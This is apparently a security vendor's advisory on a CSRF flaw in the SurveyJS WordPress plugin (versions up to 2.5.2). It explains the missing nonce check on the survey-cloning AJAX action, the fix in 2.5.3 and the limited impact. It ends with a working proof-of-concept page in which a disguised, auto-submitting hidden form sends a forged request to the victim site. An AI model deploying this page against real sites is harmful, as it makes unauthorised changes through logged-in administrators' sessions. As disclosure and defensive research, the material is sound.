Atomic Edge analysis of CVE-2025-13205 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the SurveyJS WordPress plugin, affecting versions up to and including 2.5.2. The issue resides in the AJAX handler responsible for cloning surveys. The missing nonce validation allows attackers to trick authenticated administrators into performing unintended actions, leading to unauthorized survey duplication.
Atomic Edge research identifies the root cause as a missing capability check or nonce verification on the `SurveyJS_CloneSurvey` AJAX action. The vulnerability description explicitly states missing or incorrect nonce validation. This conclusion is directly confirmed by the CVE description. The CWE classification of 352 (CSRF) supports this finding, indicating a failure to verify the origin and intent of a state-changing request.
Exploitation requires an attacker to craft a malicious web page or link that submits a forged POST request to the WordPress admin AJAX endpoint. The target must be an authenticated administrator who visits the attacker’s page. The payload would be a request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `SurveyJS_CloneSurvey`. The request would include parameters like `survey_id` to specify which survey to clone. No nonce parameter is required for the attack to succeed.
Remediation requires adding a nonce check to the `SurveyJS_CloneSurvey` AJAX handler. The patched version, 2.5.3, likely implements a call to `check_ajax_referer()` or `wp_verify_nonce()` within the callback function. This ensures the request originates from the intended user session. A capability check, such as `current_user_can(‘manage_options’)`, should also be present to enforce proper authorization.
The impact of successful exploitation is unauthorized duplication of existing surveys. This constitutes an integrity violation (I:L in the CVSS vector). Attackers cannot directly steal data or escalate privileges through this flaw alone. The attack requires user interaction (UI:R) and does not affect confidentiality or availability. Repeated exploitation could clutter a site with duplicate survey content, causing administrative overhead.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13205 - SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity <= 2.5.2 - Cross-Site Request Forgery to Survey Cloning
<?php
// CONFIGURATION
$target_url = 'https://victim-site.com'; // Base URL of the target WordPress site
$survey_id_to_clone = 1; // The ID of the survey the attacker wishes to duplicate
// This script simulates a malicious page an attacker would host.
// It contains an auto-submitting HTML form that triggers the CSRF attack.
// Assumptions:
// 1. The plugin uses the standard WordPress admin-ajax.php endpoint.
// 2. The vulnerable AJAX action is named 'SurveyJS_CloneSurvey'.
// 3. The action expects a 'survey_id' parameter.
// 4. The target user (admin) is currently logged into the WordPress site.
$ajax_endpoint = $target_url . '/wp-admin/admin-ajax.php';
$action = 'SurveyJS_CloneSurvey';
?>
<!DOCTYPE html>
<html>
<head>
<title>Benign Looking Page</title>
</head>
<body>
<p>Redirecting...</p>
<form id="csrf_form" method="POST" action="<?php echo htmlspecialchars($ajax_endpoint); ?>">
<input type="hidden" name="action" value="<?php echo htmlspecialchars($action); ?>">
<input type="hidden" name="survey_id" value="<?php echo (int)$survey_id_to_clone; ?>">
<!-- Other potential parameters required by the handler could be added here if known -->
</form>
<script>
// Automatically submit the form when the page loads
document.getElementById('csrf_form').submit();
</script>
</body>
</html>
